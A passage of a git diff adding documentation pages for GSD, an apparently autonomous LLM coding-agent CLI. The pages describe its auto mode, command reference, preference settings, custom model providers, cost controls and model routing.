+ +## Web interface + +```bash +gsd --web +``` + +A browser-based dashboard with real-time progress and multi-project support. See [web interface](/guides/web-interface) for details. + +## Troubleshooting + +### `gsd` runs `git svn dcommit` instead of GSD + +The [oh-my-zsh git plugin](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git) defines `alias gsd='git svn dcommit'`. + +**Option 1** — Remove the alias in `~/.zshrc` (after the `source $ZSH/oh-my-zsh.sh` line): + +```bash +unalias gsd 2>/dev/null +``` + +**Option 2** — Use the alternative binary name: + +```bash +gsd-cli +``` + +Both `gsd` and `gsd-cli` point to the same binary. diff --git a/mintlify-docs/guides/auto-mode.mdx b/mintlify-docs/guides/auto-mode.mdx new file mode 100644 index 000000000..1c840a011 --- /dev/null +++ b/mintlify-docs/guides/auto-mode.mdx @@ -0,0 +1,181 @@ +--- +title: "Auto mode" +description: "GSD's autonomous execution engine — run /gsd auto, walk away, come back to built software with clean git history." +--- + +Auto mode is a **state machine driven by files on disk**. It reads `.gsd/STATE.md`, determines the next unit of work, creates a fresh agent session with pre-loaded context, and lets the LLM execute. When the LLM finishes, auto mode reads disk state again and dispatches the next unit. + +## The loop + +``` +Plan → Execute (per task) → Complete → Reassess Roadmap → Next Slice + ↓ (all slices done) + Validate → Complete Milestone +``` + +- **Plan** — scouts the codebase, researches docs, decomposes the slice into tasks +- **Execute** — runs each task in a fresh context window +- **Complete** — writes summary, UAT script, marks roadmap, commits +- **Reassess** — checks if the roadmap still makes sense +- **Validate** — reconciliation gate after all slices; catches gaps before sealing the milestone + +## Key properties + +### Fresh session per unit + +Every task, research phase, and planning step gets a clean context window. 
The dispatch prompt includes everything needed — task plans, prior summaries, dependency context, decisions register — so the LLM starts oriented. + +### Context pre-loading + +| Inlined artifact | Purpose | +|------------------|---------| +| Task plan | What to build | +| Slice plan | Where this task fits | +| Prior task summaries | What's already done | +| Dependency summaries | Cross-slice context | +| Roadmap excerpt | Overall direction | +| Decisions register | Architectural context | + +The amount of context inlined is controlled by your [token profile](/guides/token-optimization). Budget mode inlines minimal context; quality mode inlines everything. + +### Git isolation + +GSD isolates milestone work using one of three modes (configured via `git.isolation` in preferences): + +- **`none`** (default) — work happens on your current branch. No isolation overhead. +- **`worktree`** — each milestone runs in its own git worktree. Squash-merged to main on completion. +- **`branch`** — work happens on a `milestone/` branch in the project root. Useful for submodule-heavy repos. + +See [git strategy](/guides/git-strategy) for details. + +### Crash recovery + +A lock file tracks the current unit. If the session dies, the next `/gsd auto` synthesizes a recovery briefing from tool calls that made it to disk and resumes with full context. + +**Headless auto-restart:** When running `gsd headless auto`, crashes trigger automatic restart with exponential backoff (5s → 10s → 30s cap, default 3 attempts). Combined with crash recovery, this enables overnight "run until done" execution. 
+ +### Provider error recovery + +| Error type | Examples | Action | +|-----------|----------|--------| +| Rate limit | 429, "too many requests" | Auto-resume after retry-after header or 60s | +| Server error | 500, 502, 503, "overloaded" | Auto-resume after 30s | +| Permanent | "unauthorized", "invalid key" | Pause indefinitely (requires manual resume) | + +### Stuck detection + +A sliding-window analysis detects stuck loops — catching cycles like A→B→A→B as well as single-unit repeats. On detection, GSD retries once with a diagnostic prompt. If it fails again, auto mode stops with the exact file it expected. + +### Timeout supervision + +| Timeout | Default | Behavior | +|---------|---------|----------| +| Soft | 20 min | Warns the LLM to wrap up | +| Idle | 10 min | Detects stalls, intervenes | +| Hard | 30 min | Pauses auto mode | + +Configure in preferences: + +```yaml +auto_supervisor: + soft_timeout_minutes: 20 + idle_timeout_minutes: 10 + hard_timeout_minutes: 30 +``` + +### Incremental memory + +GSD maintains a `KNOWLEDGE.md` file — an append-only register of project-specific rules, patterns, and lessons learned. The agent reads it at the start of every unit and appends when discovering recurring issues or non-obvious patterns. + +### Verification enforcement + +```yaml +verification_commands: + - npm run lint + - npm run test +verification_auto_fix: true +verification_max_retries: 2 +``` + +Failures trigger auto-fix retries — the agent sees the output and attempts to fix issues before advancing. + +### HTML reports + +After milestone completion, GSD auto-generates a self-contained HTML report with progress tree, dependency graph, cost/token metrics, execution timeline, and changelog. + +```yaml +auto_report: true # enabled by default +``` + +Generate manually with `/gsd export --html`, or for all milestones with `/gsd export --html --all`. 
+ +### Reactive task execution + +When `reactive_execution: true` is set, GSD derives a dependency graph from IO annotations in task plans. Tasks that don't conflict are dispatched in parallel via subagents. + +```yaml +reactive_execution: true # disabled by default +``` + +## Controlling auto mode + + + + ``` + /gsd auto + ``` + + + Press **Escape**. The conversation is preserved. You can interact with the agent, inspect state, or resume. + + + ``` + /gsd auto + ``` + Auto mode reads disk state and picks up where it left off. + + + ``` + /gsd stop + ``` + Stops auto mode gracefully. Can be run from a different terminal. + + + +### Steer during execution + +``` +/gsd steer +``` + +Hard-steer plan documents without stopping the pipeline. Changes are picked up at the next phase boundary. + +### Capture thoughts + +``` +/gsd capture "add rate limiting to API endpoints" +``` + +Fire-and-forget thought capture. Triaged automatically between tasks. See [captures and triage](/guides/captures-triage). + +## Dashboard + +`Ctrl+Alt+G` or `/gsd status` shows real-time progress: + +- Current milestone, slice, and task +- Auto mode elapsed time and phase +- Per-unit cost and token breakdown +- Cost projections +- Pending capture count + +## Phase skipping + +Token profiles can skip phases to reduce cost: + +| Phase | `budget` | `balanced` | `quality` | +|-------|----------|------------|-----------| +| Milestone research | Skipped | Runs | Runs | +| Slice research | Skipped | Skipped | Runs | +| Reassess roadmap | Skipped | Runs | Runs | + +See [token optimization](/guides/token-optimization) for details. diff --git a/mintlify-docs/guides/captures-triage.mdx b/mintlify-docs/guides/captures-triage.mdx new file mode 100644 index 000000000..9ac838640 --- /dev/null +++ b/mintlify-docs/guides/captures-triage.mdx @@ -0,0 +1,75 @@ +--- +title: "Captures and triage" +description: "Fire-and-forget thought capture during auto-mode with automated triage." 
+--- + +Captures let you fire-and-forget thoughts during auto-mode execution. Instead of pausing to steer, capture ideas, bugs, or scope changes and let GSD triage them at natural seams between tasks. + +## Quick start + +While auto-mode is running (or any time): + +``` +/gsd capture "add rate limiting to the API endpoints" +/gsd capture "the auth flow should support OAuth, not just JWT" +``` + +Captures are appended to `.gsd/CAPTURES.md` and triaged automatically between tasks. + +## How it works + +``` +capture → triage → confirm → resolve → resume +``` + + + + `/gsd capture "thought"` appends to `.gsd/CAPTURES.md` with a timestamp and unique ID. + + + At natural seams between tasks, GSD classifies each capture. + + + You're shown the proposed resolution. Plan-modifying resolutions require confirmation. + + + The resolution is applied (task injection, replan trigger, deferral, etc.). + + + Auto-mode continues. + + + +## Classification types + +| Type | Meaning | Resolution | +|------|---------|------------| +| `quick-task` | Small, self-contained fix | Inline quick task executed immediately | +| `inject` | New task needed in current slice | Task injected into the active slice plan | +| `defer` | Important but not urgent | Deferred to roadmap reassessment | +| `replan` | Changes the current approach | Triggers slice replan with capture context | +| `note` | Informational, no action | Acknowledged, no plan changes | + +## Manual triage + +Trigger triage at any time: + +``` +/gsd triage +``` + +Useful when you've accumulated several captures and want to process them before the next natural seam. + +## Dashboard integration + +The progress widget shows a pending capture count badge when captures are waiting for triage. Visible in both the `Ctrl+Alt+G` dashboard and the auto-mode widget. 
+ +## Context injection + +Capture context is automatically injected into: +- **Replan-slice prompts** — so the replan knows what triggered it +- **Reassess-roadmap prompts** — so deferred captures influence roadmap decisions + +## Worktree awareness + +Captures resolve to the **original project root's** `.gsd/CAPTURES.md`, not the worktree's local copy. Captures from a steering terminal are visible to the auto-mode session running in a worktree. diff --git a/mintlify-docs/guides/commands.mdx b/mintlify-docs/guides/commands.mdx new file mode 100644 index 000000000..8c9c9bba0 --- /dev/null +++ b/mintlify-docs/guides/commands.mdx @@ -0,0 +1,182 @@ +--- +title: "Commands reference" +description: "Every GSD command, keyboard shortcut, and CLI flag." +--- + +## Session commands + +| Command | Description | +|---------|-------------| +| `/gsd` | Step mode — execute one unit at a time, pause between each | +| `/gsd next` | Explicit step mode (same as `/gsd`) | +| `/gsd auto` | Autonomous mode — research, plan, execute, commit, repeat | +| `/gsd quick` | Execute a quick task with GSD guarantees without full planning overhead | +| `/gsd stop` | Stop auto mode gracefully | +| `/gsd pause` | Pause auto mode (preserves state, `/gsd auto` to resume) | +| `/gsd steer` | Hard-steer plan documents during execution | +| `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) | +| `/gsd rethink` | Conversational project reorganization | +| `/gsd mcp` | MCP server status and connectivity | +| `/gsd status` | Progress dashboard | +| `/gsd widget` | Cycle dashboard widget: full / small / min / off | +| `/gsd queue` | Queue and reorder future milestones (safe during auto mode) | +| `/gsd capture` | Fire-and-forget thought capture (works during auto mode) | +| `/gsd triage` | Manually trigger triage of pending captures | +| `/gsd dispatch` | Dispatch a specific phase directly | +| `/gsd history` | View execution history (supports `--cost`, `--phase`, `--model` 
filters) | +| `/gsd forensics` | Full-access debugger for auto-mode failures | +| `/gsd cleanup` | Clean up GSD state files and stale worktrees | +| `/gsd visualize` | Open workflow visualizer | +| `/gsd export --html` | Generate self-contained HTML report | +| `/gsd export --html --all` | Generate reports for all milestones | +| `/gsd update` | Update GSD to the latest version in-session | +| `/gsd knowledge` | Add persistent project knowledge | +| `/gsd fast` | Toggle service tier for supported models | +| `/gsd rate` | Rate last unit's model tier (over/ok/under) | +| `/gsd changelog` | Show categorized release notes | +| `/gsd logs` | Browse activity logs, debug logs, and metrics | +| `/gsd remote` | Control remote auto-mode | +| `/gsd help` | Categorized command reference | + +## Configuration and diagnostics + +| Command | Description | +|---------|-------------| +| `/gsd prefs` | Model selection, timeouts, budget ceiling | +| `/gsd mode` | Switch workflow mode (solo/team) | +| `/gsd config` | Re-run the provider setup wizard | +| `/gsd keys` | API key manager — list, add, remove, test, rotate | +| `/gsd doctor` | Runtime health checks with auto-fix | +| `/gsd inspect` | Show SQLite DB diagnostics | +| `/gsd init` | Project init wizard | +| `/gsd setup` | Global setup status and configuration | +| `/gsd skill-health` | Skill lifecycle dashboard | +| `/gsd hooks` | Show configured post-unit and pre-dispatch hooks | +| `/gsd run-hook` | Manually trigger a specific hook | +| `/gsd migrate` | Migrate a v1 `.planning` directory to `.gsd` format | + +## Milestone management + +| Command | Description | +|---------|-------------| +| `/gsd new-milestone` | Create a new milestone | +| `/gsd skip` | Prevent a unit from auto-mode dispatch | +| `/gsd undo` | Revert last completed unit | +| `/gsd undo-task` | Reset a specific task's completion state | +| `/gsd reset-slice` | Reset a slice and all its tasks | +| `/gsd park` | Park a milestone — skip without deleting | +| 
`/gsd unpark` | Reactivate a parked milestone |
+
+## Parallel orchestration
+
+| Command | Description |
+|---------|-------------|
+| `/gsd parallel start` | Analyze eligibility, confirm, and start workers |
+| `/gsd parallel status` | Show all workers with state, progress, and cost |
+| `/gsd parallel stop [MID]` | Stop all workers or a specific one |
+| `/gsd parallel pause [MID]` | Pause all or a specific worker |
+| `/gsd parallel resume [MID]` | Resume paused workers |
+| `/gsd parallel merge [MID]` | Merge completed milestones to main |
+
+## Workflow templates
+
+| Command | Description |
+|---------|-------------|
+| `/gsd start` | Start a workflow template (bugfix, spike, feature, hotfix, refactor, etc.) |
+| `/gsd start resume` | Resume an in-progress workflow |
+| `/gsd templates` | List available workflow templates |
+| `/gsd templates info <template>` | Show detailed template info |
+
+## Custom workflows
+
+| Command | Description |
+|---------|-------------|
+| `/gsd workflow new` | Create a new workflow definition |
+| `/gsd workflow run <name>` | Create a run and start auto-mode |
+| `/gsd workflow list` | List workflow runs |
+| `/gsd workflow validate <name>` | Validate a workflow definition |
+| `/gsd workflow pause` | Pause custom workflow auto-mode |
+| `/gsd workflow resume` | Resume paused custom workflow auto-mode |
+
+## Extensions
+
+| Command | Description |
+|---------|-------------|
+| `/gsd extensions list` | List all extensions and their status |
+| `/gsd extensions enable <name>` | Enable a disabled extension |
+| `/gsd extensions disable <name>` | Disable an extension |
+| `/gsd extensions info <name>` | Show extension details |
+
+## Keyboard shortcuts
+
+| Shortcut | Action |
+|----------|--------|
+| `Ctrl+Alt+G` | Toggle dashboard overlay |
+| `Ctrl+Alt+V` | Toggle voice transcription |
+| `Ctrl+Alt+B` | Show background shell processes |
+| `Ctrl+V` / `Alt+V` | Paste image from clipboard |
+| `Escape` | Pause auto mode |
+
+
+In terminals without Kitty keyboard 
protocol support (macOS Terminal.app, JetBrains IDEs), slash-command fallbacks are shown instead of `Ctrl+Alt` shortcuts.
+
+
+## CLI flags
+
+| Flag | Description |
+|------|-------------|
+| `gsd` | Start a new interactive session |
+| `gsd --continue` (`-c`) | Resume the most recent session |
+| `gsd --model <model>` | Override the default model |
+| `gsd --print "msg"` (`-p`) | Single-shot prompt mode (no TUI) |
+| `gsd --mode <mode>` | Output mode for non-interactive use |
+| `gsd --list-models [search]` | List available models and exit |
+| `gsd --web [path]` | Start browser-based web interface |
+| `gsd --worktree` (`-w`) `[name]` | Start session in a git worktree |
+| `gsd --no-session` | Disable session persistence |
+| `gsd --extension <path>` | Load an additional extension |
+| `gsd --version` (`-v`) | Print version and exit |
+| `gsd sessions` | Interactive session picker |
+| `gsd config` | Set up global API keys |
+| `gsd update` | Update GSD to the latest version |
+
+## Headless mode
+
+`gsd headless` runs commands without a TUI — designed for CI, cron jobs, and scripted automation.
+
+```bash
+gsd headless # run auto mode
+gsd headless next # run a single unit
+gsd headless query # instant JSON snapshot (~50ms, no LLM)
+gsd headless --timeout 600000 auto # with timeout
+gsd headless new-milestone --context brief.md --auto
+```
+
+| Flag | Description |
+|------|-------------|
+| `--timeout N` | Overall timeout in milliseconds (default: 300000) |
+| `--max-restarts N` | Auto-restart on crash (default: 3, set 0 to disable) |
+| `--json` | Stream events as JSONL to stdout |
+| `--model ID` | Override the model |
+| `--context <file>` | Context file for `new-milestone` (use `-` for stdin) |
+| `--auto` | Chain into auto-mode after milestone creation |
+
+**Exit codes:** `0` = complete, `1` = error/timeout, `2` = blocked.
+
+### `gsd headless query`
+
+Returns a JSON snapshot of the project state — no LLM session, instant response. 
+ +```bash +gsd headless query | jq '.state.phase' # "executing" +gsd headless query | jq '.next' # next dispatch action +gsd headless query | jq '.cost.total' # total spend +``` + +## MCP server mode + +```bash +gsd --mode mcp +``` + +Runs GSD as a Model Context Protocol server over stdin/stdout, exposing all tools to external AI clients (Claude Desktop, VS Code Copilot, etc.). diff --git a/mintlify-docs/guides/configuration.mdx b/mintlify-docs/guides/configuration.mdx new file mode 100644 index 000000000..4961d66b9 --- /dev/null +++ b/mintlify-docs/guides/configuration.mdx @@ -0,0 +1,306 @@ +--- +title: "Configuration" +description: "Preferences, model selection, MCP servers, hooks, and all settings." +--- + +GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project-local). Manage interactively with `/gsd prefs`. + +## Preferences commands + +| Command | Description | +|---------|-------------| +| `/gsd prefs` | Open the global preferences wizard | +| `/gsd prefs global` | Global preferences wizard | +| `/gsd prefs project` | Project preferences wizard | +| `/gsd prefs status` | Show current files, merged values, and skill status | + +## Preferences file format + +Preferences use YAML frontmatter in a markdown file: + +```yaml +--- +version: 1 +models: + research: claude-sonnet-4-6 + planning: claude-opus-4-6 + execution: claude-sonnet-4-6 + completion: claude-sonnet-4-6 +skill_discovery: suggest +auto_supervisor: + soft_timeout_minutes: 20 + idle_timeout_minutes: 10 + hard_timeout_minutes: 30 +budget_ceiling: 50.00 +token_profile: balanced +--- +``` + +## Global vs project preferences + +| Scope | Path | Applies to | +|-------|------|-----------| +| Global | `~/.gsd/PREFERENCES.md` | All projects | +| Project | `.gsd/PREFERENCES.md` | Current project only | + +**Merge behavior:** +- **Scalar fields** — project wins if defined +- **Array fields** — concatenated (global first, then project) +- **Object fields** — shallow-merged, 
project overrides per-key + +## Global API keys + +Tool API keys are stored globally in `~/.gsd/agent/auth.json`. Set them once with `/gsd config`. + +| Tool | Environment variable | Purpose | +|------|---------------------|---------| +| Tavily Search | `TAVILY_API_KEY` | Web search for non-Anthropic models | +| Brave Search | `BRAVE_API_KEY` | Web search for non-Anthropic models | +| Context7 Docs | `CONTEXT7_API_KEY` | Library documentation lookup | + +Anthropic models have built-in web search — no extra keys needed. + +## MCP servers + +GSD connects to external MCP servers configured in project files: + +- `.mcp.json` — repo-shared config +- `.gsd/mcp.json` — local-only config + + + + ```json + { + "mcpServers": { + "my-server": { + "type": "stdio", + "command": "/absolute/path/to/python3", + "args": ["/absolute/path/to/server.py"], + "env": { + "API_URL": "http://localhost:8000" + } + } + } + } + ``` + + + ```json + { + "mcpServers": { + "my-http-server": { + "url": "http://localhost:8080/mcp" + } + } + } + ``` + + + +Verify from a GSD session: `mcp_servers` → `mcp_discover` → `mcp_call`. + +## Models + +Per-phase model selection: + +```yaml +models: + research: claude-sonnet-4-6 + planning: + model: claude-opus-4-6 + fallbacks: + - openrouter/z-ai/glm-5 + execution: claude-sonnet-4-6 + execution_simple: claude-haiku-4-5-20250414 + completion: claude-sonnet-4-6 + subagent: claude-sonnet-4-6 +``` + +**Phases:** `research`, `planning`, `execution`, `execution_simple`, `completion`, `subagent` + +When a model fails to switch, GSD automatically tries the next model in the `fallbacks` list. + +For custom providers (Ollama, vLLM, LM Studio), see [custom models](/guides/custom-models). + +## All settings + +### `token_profile` + +Coordinates model selection, phase skipping, and context compression. Values: `budget`, `balanced` (default), `quality`. See [token optimization](/guides/token-optimization). 
+ +### `budget_ceiling` + +Maximum USD spend during auto mode: + +```yaml +budget_ceiling: 50.00 +budget_enforcement: pause # warn, pause (default), or halt +``` + +### `auto_supervisor` + +Timeout thresholds: + +```yaml +auto_supervisor: + soft_timeout_minutes: 20 + idle_timeout_minutes: 10 + hard_timeout_minutes: 30 +``` + +### `skill_discovery` + +| Value | Behavior | +|-------|----------| +| `auto` | Skills found and applied automatically | +| `suggest` | Skills identified but not auto-installed (default) | +| `off` | Disabled | + +### Verification + +```yaml +verification_commands: + - npm run lint + - npm run test +verification_auto_fix: true +verification_max_retries: 2 +``` + +### Git + +See [git strategy](/guides/git-strategy) for full git configuration. + +### Notifications + +```yaml +notifications: + enabled: true + on_complete: true + on_error: true + on_budget: true + on_milestone: true + on_attention: true +``` + +### Post-unit hooks + +```yaml +post_unit_hooks: + - name: code-review + after: [execute-task] + prompt: "Review the code changes for quality and security." + model: claude-opus-4-6 + max_cycles: 1 + artifact: REVIEW.md +``` + +### Pre-dispatch hooks + +```yaml +pre_dispatch_hooks: + - name: add-standards + before: [execute-task] + action: modify # modify, skip, or replace + prepend: "Follow our coding standards." +``` + +### Skill routing + +```yaml +always_use_skills: + - debug-like-expert +prefer_skills: + - frontend-design +skill_rules: + - when: task involves authentication + use: [clerk] +``` + +### Custom instructions + +```yaml +custom_instructions: + - "Always use TypeScript strict mode" + - "Prefer functional patterns over classes" +``` + +### Dynamic routing + +See [dynamic model routing](/guides/dynamic-model-routing). + +### Parallel execution + +See [parallel orchestration](/guides/parallel-orchestration). 
+ +## Environment variables + +| Variable | Default | Description | +|----------|---------|-------------| +| `GSD_HOME` | `~/.gsd` | Global GSD directory | +| `GSD_PROJECT_ID` | (auto-hash) | Override project identity hash | +| `GSD_STATE_DIR` | `$GSD_HOME` | Per-project state root | +| `GSD_CODING_AGENT_DIR` | `$GSD_HOME/agent` | Agent directory | + +## Full example + + +```yaml +--- +version: 1 + +models: + research: openrouter/deepseek/deepseek-r1 + planning: + model: claude-opus-4-6 + fallbacks: + - openrouter/z-ai/glm-5 + execution: claude-sonnet-4-6 + execution_simple: claude-haiku-4-5-20250414 + completion: claude-sonnet-4-6 + +token_profile: balanced + +dynamic_routing: + enabled: true + escalate_on_failure: true + budget_pressure: true + +budget_ceiling: 25.00 +budget_enforcement: pause +context_pause_threshold: 80 + +auto_supervisor: + soft_timeout_minutes: 15 + hard_timeout_minutes: 25 + +git: + auto_push: true + merge_strategy: squash + isolation: none + commit_docs: true + +skill_discovery: suggest +always_use_skills: + - debug-like-expert +skill_rules: + - when: task involves authentication + use: [clerk] + +notifications: + on_complete: false + on_milestone: true + on_attention: true + +auto_visualize: true +service_tier: priority +forensics_dedup: true +show_token_cost: true + +post_unit_hooks: + - name: code-review + after: [execute-task] + prompt: "Review {sliceId}/{taskId} for quality and security." + artifact: REVIEW.md +--- +``` + diff --git a/mintlify-docs/guides/cost-management.mdx b/mintlify-docs/guides/cost-management.mdx new file mode 100644 index 000000000..52e25e6c8 --- /dev/null +++ b/mintlify-docs/guides/cost-management.mdx @@ -0,0 +1,80 @@ +--- +title: "Cost management" +description: "Budget ceilings, cost tracking, projections, and enforcement modes." +--- + +GSD tracks token usage and cost for every unit of work dispatched during auto mode. This data powers the dashboard, budget enforcement, and cost projections. 
+ +## Cost tracking + +Every unit's metrics are captured automatically: + +- **Token counts** — input, output, cache read, cache write, total +- **Cost** — USD cost per unit +- **Duration** — wall-clock time +- **Tool calls** — number of tool invocations +- **Message counts** — assistant and user messages + +Data is stored in `.gsd/metrics.json` and survives across sessions. + +### Viewing costs + +`Ctrl+Alt+G` or `/gsd status` shows real-time cost breakdown by: + +- Phase (research, planning, execution, completion, reassessment) +- Slice (M001/S01, M001/S02, ...) +- Model (which models consumed the most budget) +- Project totals + +## Budget ceiling + +```yaml +budget_ceiling: 50.00 +``` + +### Enforcement modes + +| Mode | Behavior | +|------|----------| +| `warn` | Log a warning, continue | +| `pause` | Pause auto mode (default when ceiling is set) | +| `halt` | Stop auto mode entirely | + +## Cost projections + +After two or more slices complete, GSD projects the remaining cost: + +``` +Projected remaining: $12.40 ($6.20/slice avg × 2 remaining) +``` + +## Budget pressure and model downgrading + +When approaching the budget ceiling, the [complexity router](/guides/token-optimization) automatically downgrades model assignments: + +| Budget used | Effect | +|------------|--------| +| < 50% | No adjustment | +| 50-75% | Standard tasks → Light | +| 75-90% | More aggressive | +| > 90% | Nearly everything downgrades | + +## Token profiles and cost + +| Profile | Typical savings | How | +|---------|----------------|-----| +| `budget` | 40-60% | Cheaper models, phase skipping, minimal context | +| `balanced` | 10-20% | Default models, skip slice research | +| `quality` | 0% (baseline) | Full models, all phases | + +See [token optimization](/guides/token-optimization) for details. 
+ +## Tips + +- Start with `balanced` and a generous `budget_ceiling` to establish baseline costs +- Check `/gsd status` after a few slices to see per-slice averages +- Switch to `budget` for well-understood, repetitive work +- Use `quality` only for architectural decisions +- Per-phase model selection lets you use Opus for planning while keeping execution on Sonnet +- Enable [dynamic routing](/guides/dynamic-model-routing) for automatic downgrading on simple tasks +- Use `/gsd visualize` → Metrics tab to see where your budget is going diff --git a/mintlify-docs/guides/custom-models.mdx b/mintlify-docs/guides/custom-models.mdx new file mode 100644 index 000000000..02e61ae7d --- /dev/null +++ b/mintlify-docs/guides/custom-models.mdx @@ -0,0 +1,126 @@ +--- +title: "Custom models" +description: "Add custom providers and models (Ollama, vLLM, LM Studio, proxies) via models.json." +--- + +Define custom models and providers in `~/.gsd/agent/models.json`. This lets you add models not in the default registry — self-hosted endpoints, fine-tuned models, proxies, or new provider releases. + +The file reloads each time you open `/model` — no restart needed. + +## Minimal example + +For local models (Ollama, LM Studio, vLLM): + +```json +{ + "providers": { + "ollama": { + "baseUrl": "http://localhost:11434/v1", + "api": "openai-completions", + "apiKey": "ollama", + "models": [ + { "id": "llama3.1:8b" }, + { "id": "qwen2.5-coder:7b" } + ] + } + } +} +``` + +The `apiKey` is required but Ollama ignores it — any value works. 
+ +## Supported APIs + +| API | Description | +|-----|-------------| +| `openai-completions` | OpenAI Chat Completions (most compatible) | +| `openai-responses` | OpenAI Responses API | +| `anthropic-messages` | Anthropic Messages API | +| `google-generative-ai` | Google Generative AI | + +## Provider configuration + +| Field | Description | +|-------|-------------| +| `baseUrl` | API endpoint URL | +| `api` | API type | +| `apiKey` | API key (supports shell commands, env vars, or literals) | +| `headers` | Custom headers | +| `authHeader` | Set `true` to add `Authorization: Bearer` automatically | +| `models` | Array of model configurations | +| `modelOverrides` | Per-model overrides for built-in models | + +### Value resolution + +The `apiKey` and `headers` fields support three formats: + +```json +"apiKey": "!security find-generic-password -ws 'anthropic'" // shell command +"apiKey": "MY_API_KEY" // env variable +"apiKey": "sk-..." // literal value +``` + +## Model configuration + +| Field | Required | Default | Description | +|-------|----------|---------|-------------| +| `id` | Yes | — | Model identifier (passed to the API) | +| `name` | No | `id` | Human-readable label | +| `api` | No | provider's `api` | Override per model | +| `reasoning` | No | `false` | Supports extended thinking | +| `input` | No | `["text"]` | `["text"]` or `["text", "image"]` | +| `contextWindow` | No | `128000` | Context window size | +| `maxTokens` | No | `16384` | Maximum output tokens | +| `cost` | No | all zeros | Per-million tokens: `input`, `output`, `cacheRead`, `cacheWrite` | + +## Overriding built-in providers + +Route a built-in provider through a proxy without redefining models: + +```json +{ + "providers": { + "anthropic": { + "baseUrl": "https://my-proxy.example.com/v1" + } + } +} +``` + +All built-in Anthropic models remain available. To add custom models alongside built-in ones, include the `models` array. 
+ +## OpenAI compatibility + +For providers with partial OpenAI compatibility, use the `compat` field at provider or model level: + +```json +{ + "providers": { + "local-llm": { + "baseUrl": "http://localhost:8080/v1", + "api": "openai-completions", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [...] + } + } +} +``` + +| Field | Description | +|-------|-------------| +| `supportsDeveloperRole` | Use `developer` vs `system` role | +| `supportsReasoningEffort` | Support for `reasoning_effort` parameter | +| `supportsUsageInStreaming` | Support for `stream_options: { include_usage: true }` | +| `maxTokensField` | `max_completion_tokens` or `max_tokens` | +| `thinkingFormat` | `reasoning_effort`, `zai`, `qwen`, or `qwen-chat-template` | +| `openRouterRouting` | OpenRouter provider selection config | +| `vercelGatewayRouting` | Vercel AI Gateway provider selection | + +## Community provider extensions + +| Extension | Provider | Models | Install | +|-----------|----------|--------|---------| +| [`pi-dashscope`](https://www.npmjs.com/package/pi-dashscope) | Alibaba DashScope | Qwen3, GLM-5, MiniMax M2.5, Kimi K2.5 | `gsd install npm:pi-dashscope` | diff --git a/mintlify-docs/guides/dynamic-model-routing.mdx b/mintlify-docs/guides/dynamic-model-routing.mdx new file mode 100644 index 000000000..d6cb80ed6 --- /dev/null +++ b/mintlify-docs/guides/dynamic-model-routing.mdx @@ -0,0 +1,94 @@ +--- +title: "Dynamic model routing" +description: "Automatically select cheaper models for simple work and reserve expensive models for complex tasks." +--- + +Dynamic model routing classifies each dispatched unit into a complexity tier and selects an appropriate model. This reduces token consumption by 20-50% without sacrificing quality where it matters. + +The key rule: **downgrade-only semantics**. Your configured model is always the ceiling — routing never upgrades beyond what you've configured. 
+ +## Enabling + +```yaml +dynamic_routing: + enabled: true +``` + +## Complexity tiers + +| Tier | Typical work | Default model level | +|------|-------------|-------------------| +| **Light** | Slice completion, UAT, hooks | Haiku-class | +| **Standard** | Research, planning, execution | Sonnet-class | +| **Heavy** | Replanning, roadmap reassessment | Opus-class | + +## Configuration + +```yaml +dynamic_routing: + enabled: true + tier_models: + light: claude-haiku-4-5 + standard: claude-sonnet-4-6 + heavy: claude-opus-4-6 + escalate_on_failure: true # bump tier on task failure + budget_pressure: true # auto-downgrade near budget ceiling + cross_provider: true # consider models from other providers +``` + +### `escalate_on_failure` + +When a task fails at a given tier, the router escalates: Light → Standard → Heavy. Prevents cheap models from burning retries on work that needs more reasoning. + +### `budget_pressure` + +Progressive downgrading as budget ceiling approaches: + +| Budget used | Effect | +|------------|--------| +| < 50% | No adjustment | +| 50-75% | Standard → Light | +| 75-90% | More aggressive | +| > 90% | Nearly everything → Light | + +### `cross_provider` + +The router may select models from providers other than your primary, using a built-in cost table to find the cheapest model at each tier. + +## Task plan analysis + +For `execute-task` units, the classifier analyzes the task plan: + +| Signal | Simple → Light | Complex → Heavy | +|--------|---------------|----------------| +| Step count | ≤ 3 | ≥ 8 | +| File count | ≤ 3 | ≥ 8 | +| Description length | < 500 chars | > 2000 chars | +| Code blocks | — | ≥ 5 | +| Complexity keywords | None | Present | + +## Adaptive learning + +The routing history (`.gsd/routing-history.json`) tracks success/failure per tier per unit type. If a tier's failure rate exceeds 20%, future classifications are bumped up. + +User feedback (`/gsd rate`) is weighted 2x vs automatic outcomes. 
+ +## Cost table + +| Model | Input (per M) | Output (per M) | +|-------|-------|--------| +| claude-haiku-4-5 | $0.80 | $4.00 | +| claude-sonnet-4-6 | $3.00 | $15.00 | +| claude-opus-4-6 | $15.00 | $75.00 | +| gpt-4o-mini | $0.15 | $0.60 | +| gpt-4o | $2.50 | $10.00 | +| gemini-2.0-flash | $0.10 | $0.40 | + +The cost table is for comparison only — actual billing comes from your provider. + +## Interaction with token profiles + +- **Token profiles** control phase skipping and context compression +- **Dynamic routing** controls per-unit model selection within those constraints + +The `budget` profile + dynamic routing provides maximum cost savings. diff --git a/mintlify-docs/guides/git-strategy.mdx b/mintlify-docs/guides/git-strategy.mdx new file mode 100644 index 000000000..67ce24742 --- /dev/null +++ b/mintlify-docs/guides/git-strategy.mdx @@ -0,0 +1,157 @@ +--- +title: "Git strategy" +description: "Isolation modes, branching model, and merge behavior for milestone work." +--- + +GSD uses git for milestone isolation and sequential commits. You choose an **isolation mode** that controls where work happens. The strategy is fully automated — no manual branch management needed. + +## Isolation modes + +Configure via the `git.isolation` preference: + +| Mode | Working directory | Branch | Best for | +|------|-------------------|--------|----------| +| `none` (default) | Project root | Current branch | Most projects — no isolation overhead | +| `worktree` | `.gsd/worktrees//` | `milestone/` | Full file isolation | +| `branch` | Project root | `milestone/` | Submodule-heavy repos | + +### `none` mode (default) + +Work happens directly on your current branch. No worktree, no milestone branch. GSD still commits sequentially with conventional commit messages, but there's no branch isolation. This is the simplest mode and works well for most projects. + +### `worktree` mode + +Each milestone gets its own git worktree on a `milestone/` branch. 
